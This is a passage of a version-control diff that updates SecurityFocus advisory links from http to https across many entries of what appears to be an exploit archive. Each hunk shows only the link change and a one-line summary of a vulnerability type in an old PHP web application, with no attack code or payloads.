@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16116/info +source: https://www.securityfocus.com/bid/16116/info vBulletin is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27020.txt b/exploits/php/webapps/27020.txt index acee3e144..e55fb0027 100644 --- a/exploits/php/webapps/27020.txt +++ b/exploits/php/webapps/27020.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16117/info +source: https://www.securityfocus.com/bid/16117/info Drupal is prone to an HTML injection vulnerability when handling URL-encoded HTML and script code in message content. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27022.txt b/exploits/php/webapps/27022.txt index a1cbba426..91575fb58 100644 --- a/exploits/php/webapps/27022.txt +++ b/exploits/php/webapps/27022.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16121/info +source: https://www.securityfocus.com/bid/16121/info Bugport is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27023.txt b/exploits/php/webapps/27023.txt index 922a143d1..8efbaec1d 100644 --- a/exploits/php/webapps/27023.txt +++ b/exploits/php/webapps/27023.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16123/info +source: https://www.securityfocus.com/bid/16123/info Bugport is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27025.txt b/exploits/php/webapps/27025.txt index 9a9f99022..22777f3b8 100644 --- a/exploits/php/webapps/27025.txt 
+++ b/exploits/php/webapps/27025.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16125/info +source: https://www.securityfocus.com/bid/16125/info Primo Cart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27027.txt b/exploits/php/webapps/27027.txt index 8e45b872b..4acd8d2b4 100644 --- a/exploits/php/webapps/27027.txt +++ b/exploits/php/webapps/27027.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16130/info +source: https://www.securityfocus.com/bid/16130/info Jax Calendar is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27028.txt b/exploits/php/webapps/27028.txt index af91ad6d1..03deddb5f 100644 --- a/exploits/php/webapps/27028.txt +++ b/exploits/php/webapps/27028.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16132/info +source: https://www.securityfocus.com/bid/16132/info LogicBill is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27029.txt b/exploits/php/webapps/27029.txt index 1b86c3b3b..ae0c49bdd 100644 --- a/exploits/php/webapps/27029.txt +++ b/exploits/php/webapps/27029.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16133/info +source: https://www.securityfocus.com/bid/16133/info EZI is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27030.txt b/exploits/php/webapps/27030.txt index 61f4a84fb..0a43bebef 100644 --- a/exploits/php/webapps/27030.txt +++ b/exploits/php/webapps/27030.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16134/info +source: https://www.securityfocus.com/bid/16134/info CS-Cart is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27033.txt b/exploits/php/webapps/27033.txt index b8d48f741..e6783aab6 100644 --- a/exploits/php/webapps/27033.txt +++ b/exploits/php/webapps/27033.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16154/info +source: https://www.securityfocus.com/bid/16154/info Foro Domus is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27037.txt b/exploits/php/webapps/27037.txt index 2d950b8a3..a5846ed4c 100644 --- a/exploits/php/webapps/27037.txt +++ b/exploits/php/webapps/27037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16161/info +source: https://www.securityfocus.com/bid/16161/info TheWebForum is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27038.txt b/exploits/php/webapps/27038.txt index bb8cafea9..fa1b45896 100644 --- a/exploits/php/webapps/27038.txt +++ b/exploits/php/webapps/27038.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16163/info +source: https://www.securityfocus.com/bid/16163/info TinyPHPForum is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27048.txt b/exploits/php/webapps/27048.txt index fdc38aab4..ed3315e34 100644 --- a/exploits/php/webapps/27048.txt +++ b/exploits/php/webapps/27048.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16166/info +source: https://www.securityfocus.com/bid/16166/info AppServ Open Project is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27052.txt b/exploits/php/webapps/27052.txt index 5e262e20d..064ea2fca 100644 --- a/exploits/php/webapps/27052.txt +++ b/exploits/php/webapps/27052.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16169/info +source: https://www.securityfocus.com/bid/16169/info 427BB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27053.txt b/exploits/php/webapps/27053.txt index 478b050bd..4a54da31d 100644 --- a/exploits/php/webapps/27053.txt +++ b/exploits/php/webapps/27053.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16176/info +source: https://www.securityfocus.com/bid/16176/info Venom Board is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27054.txt b/exploits/php/webapps/27054.txt index 0bf3998b6..e59fb8ca7 100644 --- a/exploits/php/webapps/27054.txt +++ b/exploits/php/webapps/27054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16178/info +source: https://www.securityfocus.com/bid/16178/info 427BB is prone to an authentication bypass vulnerability. This issue is due to a failure in the application to properly validate user-supplied data. diff --git a/exploits/php/webapps/27058.txt b/exploits/php/webapps/27058.txt index 96f202fc4..88ce8a254 100644 --- a/exploits/php/webapps/27058.txt +++ b/exploits/php/webapps/27058.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16186/info +source: https://www.securityfocus.com/bid/16186/info PHPNuke EV is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27059.txt b/exploits/php/webapps/27059.txt index f35b72833..453d566b9 100644 --- a/exploits/php/webapps/27059.txt +++ b/exploits/php/webapps/27059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16189/info +source: https://www.securityfocus.com/bid/16189/info The XOOPS Pool Module is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27060.txt b/exploits/php/webapps/27060.txt index 21370e912..0c54485a5 100644 --- a/exploits/php/webapps/27060.txt +++ b/exploits/php/webapps/27060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16192/info +source: https://www.securityfocus.com/bid/16192/info The PHPNuke Pool and News Modules are prone to an HTML injection vulnerability. This issue is due to a failure in the application modules to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27064.txt b/exploits/php/webapps/27064.txt index 636203ab2..ead80c983 100644 --- a/exploits/php/webapps/27064.txt +++ b/exploits/php/webapps/27064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16199/info +source: https://www.securityfocus.com/bid/16199/info Orjinweb is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27067.txt b/exploits/php/webapps/27067.txt index 39524c3aa..472278f1f 100644 --- a/exploits/php/webapps/27067.txt +++ b/exploits/php/webapps/27067.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16210/info +source: https://www.securityfocus.com/bid/16210/info MyPhPim is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27068.txt b/exploits/php/webapps/27068.txt index 09eebae4b..140dc437a 100644 --- a/exploits/php/webapps/27068.txt +++ b/exploits/php/webapps/27068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16210/info +source: https://www.securityfocus.com/bid/16210/info MyPhPim is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27070.txt b/exploits/php/webapps/27070.txt index 419327255..cf15d729b 100644 --- a/exploits/php/webapps/27070.txt +++ b/exploits/php/webapps/27070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16214/info +source: https://www.securityfocus.com/bid/16214/info TrackPoint NX is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27075.txt b/exploits/php/webapps/27075.txt index 838b4a4aa..84413ac65 100644 --- a/exploits/php/webapps/27075.txt +++ b/exploits/php/webapps/27075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16228/info +source: https://www.securityfocus.com/bid/16228/info TankLogger is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27077.txt b/exploits/php/webapps/27077.txt index eb9edf416..3815c519c 100644 --- a/exploits/php/webapps/27077.txt +++ b/exploits/php/webapps/27077.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16232/info +source: https://www.securityfocus.com/bid/16232/info DCP Portal is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27078.txt b/exploits/php/webapps/27078.txt index b29d11624..6ce1f703a 100644 --- a/exploits/php/webapps/27078.txt +++ b/exploits/php/webapps/27078.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16233/info +source: https://www.securityfocus.com/bid/16233/info Template Seller Pro is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27080.txt b/exploits/php/webapps/27080.txt index 6e97e80f9..a7c5cec6e 100644 --- a/exploits/php/webapps/27080.txt +++ b/exploits/php/webapps/27080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16237/info +source: https://www.securityfocus.com/bid/16237/info ezDatabase is prone to a remote PHP script code execution vulnerability. diff --git a/exploits/php/webapps/27084.txt b/exploits/php/webapps/27084.txt index 53345e5e0..95f1f61bf 100644 --- a/exploits/php/webapps/27084.txt +++ b/exploits/php/webapps/27084.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16244/info +source: https://www.securityfocus.com/bid/16244/info Bit 5 Blog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27085.txt b/exploits/php/webapps/27085.txt index 19fb25b3f..bd092f854 100644 --- a/exploits/php/webapps/27085.txt +++ b/exploits/php/webapps/27085.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16246/info +source: https://www.securityfocus.com/bid/16246/info Bit 5 Blog is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27086.txt b/exploits/php/webapps/27086.txt index 23f2347ed..1474c3124 100644 --- a/exploits/php/webapps/27086.txt +++ b/exploits/php/webapps/27086.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16247/info +source: https://www.securityfocus.com/bid/16247/info White Album is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27087.txt b/exploits/php/webapps/27087.txt index daa50425f..bde3a736f 100644 --- a/exploits/php/webapps/27087.txt +++ b/exploits/php/webapps/27087.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16249/info +source: https://www.securityfocus.com/bid/16249/info geoBlog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27092.txt b/exploits/php/webapps/27092.txt index a9b6753b0..5f3c9920c 100644 --- a/exploits/php/webapps/27092.txt +++ b/exploits/php/webapps/27092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16255/info +source: https://www.securityfocus.com/bid/16255/info GTP iCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/27093.txt b/exploits/php/webapps/27093.txt index c63af5c6b..cf61bc73e 100644 --- a/exploits/php/webapps/27093.txt +++ b/exploits/php/webapps/27093.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16257/info +source: https://www.securityfocus.com/bid/16257/info EZDatabase is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27097.txt b/exploits/php/webapps/27097.txt index b23cfcad5..54dbb1716 100644 --- a/exploits/php/webapps/27097.txt +++ b/exploits/php/webapps/27097.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16263/info +source: https://www.securityfocus.com/bid/16263/info phpXplorer is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27098.txt b/exploits/php/webapps/27098.txt index dfebd618d..f5bf7ca35 100644 --- a/exploits/php/webapps/27098.txt +++ b/exploits/php/webapps/27098.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16266/info +source: https://www.securityfocus.com/bid/16266/info Referrer Tracker is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27099.txt b/exploits/php/webapps/27099.txt index aca0763d7..6589cf910 100644 --- a/exploits/php/webapps/27099.txt +++ b/exploits/php/webapps/27099.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16269/info +source: https://www.securityfocus.com/bid/16269/info BlogPHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27100.txt b/exploits/php/webapps/27100.txt index 24f634d67..3c9c21315 100644 --- a/exploits/php/webapps/27100.txt +++ b/exploits/php/webapps/27100.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16270/info +source: https://www.securityfocus.com/bid/16270/info microBlog is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27102.txt b/exploits/php/webapps/27102.txt index 9dec24014..2809a2989 100644 --- a/exploits/php/webapps/27102.txt +++ b/exploits/php/webapps/27102.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16279/info +source: https://www.securityfocus.com/bid/16279/info PowerPortal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27103.txt b/exploits/php/webapps/27103.txt index a82c0dc1d..d15a4b374 100644 --- a/exploits/php/webapps/27103.txt +++ b/exploits/php/webapps/27103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16279/info +source: https://www.securityfocus.com/bid/16279/info PowerPortal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27104.txt b/exploits/php/webapps/27104.txt index dc93083c7..d558d3675 100644 --- a/exploits/php/webapps/27104.txt +++ b/exploits/php/webapps/27104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16286/info +source: https://www.securityfocus.com/bid/16286/info AOblogger is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27105.txt b/exploits/php/webapps/27105.txt index b5634e3e7..58f330486 100644 --- a/exploits/php/webapps/27105.txt +++ b/exploits/php/webapps/27105.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16286/info +source: https://www.securityfocus.com/bid/16286/info AOblogger is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27106.txt b/exploits/php/webapps/27106.txt index de526b11d..b661965f2 100644 --- a/exploits/php/webapps/27106.txt +++ b/exploits/php/webapps/27106.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16286/info +source: https://www.securityfocus.com/bid/16286/info AOblogger is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27107.txt b/exploits/php/webapps/27107.txt index 8a83e312f..2cc2071e6 100644 --- a/exploits/php/webapps/27107.txt +++ b/exploits/php/webapps/27107.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16292/info +source: https://www.securityfocus.com/bid/16292/info phpXplorer is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27109.txt b/exploits/php/webapps/27109.txt index be6bc6172..34972f36c 100644 --- a/exploits/php/webapps/27109.txt +++ b/exploits/php/webapps/27109.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16300/info +source: https://www.securityfocus.com/bid/16300/info Phpclanwebsite is prone to a script-injection vulnerability. diff --git a/exploits/php/webapps/27110.txt b/exploits/php/webapps/27110.txt index 44f62995d..e42b10628 100644 --- a/exploits/php/webapps/27110.txt +++ b/exploits/php/webapps/27110.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16305/info +source: https://www.securityfocus.com/bid/16305/info Eggblog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27111.txt b/exploits/php/webapps/27111.txt index 827c01d7d..f129db85c 100644 --- a/exploits/php/webapps/27111.txt +++ b/exploits/php/webapps/27111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16305/info +source: https://www.securityfocus.com/bid/16305/info Eggblog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27112.txt b/exploits/php/webapps/27112.txt index 86077e104..09d2275e9 100644 --- a/exploits/php/webapps/27112.txt +++ b/exploits/php/webapps/27112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16306/info +source: https://www.securityfocus.com/bid/16306/info saralblog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27114.txt b/exploits/php/webapps/27114.txt index cb22e8409..0f22db0b6 100644 --- a/exploits/php/webapps/27114.txt +++ b/exploits/php/webapps/27114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16319/info +source: https://www.securityfocus.com/bid/16319/info WebspotBlogging is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27116.txt b/exploits/php/webapps/27116.txt index 2fdac8506..a6966bab6 100644 --- a/exploits/php/webapps/27116.txt +++ b/exploits/php/webapps/27116.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16339/info +source: https://www.securityfocus.com/bid/16339/info NewsPHP is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27117.txt b/exploits/php/webapps/27117.txt index 2c1370ca8..a9e5e9e7a 100644 --- a/exploits/php/webapps/27117.txt +++ b/exploits/php/webapps/27117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16340/info +source: https://www.securityfocus.com/bid/16340/info BlogPHP is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27118.pl b/exploits/php/webapps/27118.pl index 188de6dbc..46393f820 100755 --- a/exploits/php/webapps/27118.pl +++ b/exploits/php/webapps/27118.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16342/info +source: https://www.securityfocus.com/bid/16342/info RCBlog is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27119.txt b/exploits/php/webapps/27119.txt index f9438ad35..1eb7a15db 100644 --- a/exploits/php/webapps/27119.txt +++ b/exploits/php/webapps/27119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16344/info +source: https://www.securityfocus.com/bid/16344/info The e-moBLOG application is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27120.txt b/exploits/php/webapps/27120.txt index 491dcc754..2883e9b18 100644 --- a/exploits/php/webapps/27120.txt +++ b/exploits/php/webapps/27120.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16351/info +source: https://www.securityfocus.com/bid/16351/info AZbb is prone to HTML-injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27121.txt b/exploits/php/webapps/27121.txt index 42437f3be..257262d13 100644 --- a/exploits/php/webapps/27121.txt +++ b/exploits/php/webapps/27121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16360/info +source: https://www.securityfocus.com/bid/16360/info 123 Flash Chat is prone to an arbitrary code injection weakness. diff --git a/exploits/php/webapps/27122.txt b/exploits/php/webapps/27122.txt index 12791302d..09066d23c 100644 --- a/exploits/php/webapps/27122.txt +++ b/exploits/php/webapps/27122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16361/info +source: https://www.securityfocus.com/bid/16361/info MyBB is prone to an HTML-injection vulnerability. This issue is due to a lack of proper sanitization of user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27123.txt b/exploits/php/webapps/27123.txt index 164ee0b2e..bb89454be 100644 --- a/exploits/php/webapps/27123.txt +++ b/exploits/php/webapps/27123.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16362/info +source: https://www.securityfocus.com/bid/16362/info Pixelpost is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27124.txt b/exploits/php/webapps/27124.txt index d74209dff..8de26fa11 100644 --- a/exploits/php/webapps/27124.txt +++ b/exploits/php/webapps/27124.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16363/info +source: https://www.securityfocus.com/bid/16363/info SleeperChat is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27125.txt b/exploits/php/webapps/27125.txt index 18b285deb..2aa40e561 100644 --- a/exploits/php/webapps/27125.txt +++ b/exploits/php/webapps/27125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16367/info +source: https://www.securityfocus.com/bid/16367/info miniBloggie is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27126.txt b/exploits/php/webapps/27126.txt index e4527759b..23a907ecb 100644 --- a/exploits/php/webapps/27126.txt +++ b/exploits/php/webapps/27126.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16376/info +source: https://www.securityfocus.com/bid/16376/info CheesyBlog is prone to multiple HTML injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27127.txt b/exploits/php/webapps/27127.txt index 17f67d6f2..bf45a0d2e 100644 --- a/exploits/php/webapps/27127.txt +++ b/exploits/php/webapps/27127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16377/info +source: https://www.securityfocus.com/bid/16377/info ExpressionEngine is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to HTTP 'Referer' header before using it in dynamically generated content. diff --git a/exploits/php/webapps/27137.txt b/exploits/php/webapps/27137.txt index ad4b40385..e702b05c5 100644 --- a/exploits/php/webapps/27137.txt +++ b/exploits/php/webapps/27137.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16387/info +source: https://www.securityfocus.com/bid/16387/info MyBB is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27138.txt b/exploits/php/webapps/27138.txt index d8d6344a7..3ecadf4b4 100644 --- a/exploits/php/webapps/27138.txt +++ b/exploits/php/webapps/27138.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16393/info +source: https://www.securityfocus.com/bid/16393/info AndoNET Blog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27139.txt b/exploits/php/webapps/27139.txt index 5fee8ded2..8e68715b5 100644 --- a/exploits/php/webapps/27139.txt +++ b/exploits/php/webapps/27139.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16395/info +source: https://www.securityfocus.com/bid/16395/info My Little Homepage Web log, guestbook, and forum are prone to a script injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27146.txt b/exploits/php/webapps/27146.txt index 517088a70..a1ded7a59 100644 --- a/exploits/php/webapps/27146.txt +++ b/exploits/php/webapps/27146.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16412/info +source: https://www.securityfocus.com/bid/16412/info sPaiz-Nuke is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27147.txt b/exploits/php/webapps/27147.txt index 9817511a0..2becaf8fd 100644 --- a/exploits/php/webapps/27147.txt +++ b/exploits/php/webapps/27147.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16421/info +source: https://www.securityfocus.com/bid/16421/info PmWiki is prone to multiple input-validation vulnerabilities. These issues are due to failures in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27149.txt b/exploits/php/webapps/27149.txt index bbd9d72da..932bddb4e 100644 --- a/exploits/php/webapps/27149.txt +++ b/exploits/php/webapps/27149.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16426/info +source: https://www.securityfocus.com/bid/16426/info Ashnews is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27153.txt b/exploits/php/webapps/27153.txt index ef42ae0de..549e2ed5d 100644 --- a/exploits/php/webapps/27153.txt +++ b/exploits/php/webapps/27153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16439/info +source: https://www.securityfocus.com/bid/16439/info Cerberus Helpdesk is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27154.txt b/exploits/php/webapps/27154.txt index dc12ea0cf..b0589a6ef 100644 --- a/exploits/php/webapps/27154.txt +++ b/exploits/php/webapps/27154.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16440/info +source: https://www.securityfocus.com/bid/16440/info FarsiNews is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27155.txt b/exploits/php/webapps/27155.txt index b4c8633c2..568c2b577 100644 --- a/exploits/php/webapps/27155.txt +++ b/exploits/php/webapps/27155.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16443/info +source: https://www.securityfocus.com/bid/16443/info MyBB is prone to an SQL-injection vulnerability. diff --git a/exploits/php/webapps/27156.txt b/exploits/php/webapps/27156.txt index 8561767c8..a1d6e3dba 100644 --- a/exploits/php/webapps/27156.txt +++ b/exploits/php/webapps/27156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16454/info +source: https://www.securityfocus.com/bid/16454/info SZUserMgnt is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27157.txt b/exploits/php/webapps/27157.txt index d3218dbca..6bfe2dcac 100644 --- a/exploits/php/webapps/27157.txt +++ b/exploits/php/webapps/27157.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16458/info +source: https://www.securityfocus.com/bid/16458/info SPIP is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27158.txt b/exploits/php/webapps/27158.txt index ac348a015..ae025a52f 100644 --- a/exploits/php/webapps/27158.txt +++ b/exploits/php/webapps/27158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16461/info +source: https://www.securityfocus.com/bid/16461/info SPIP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27162.txt 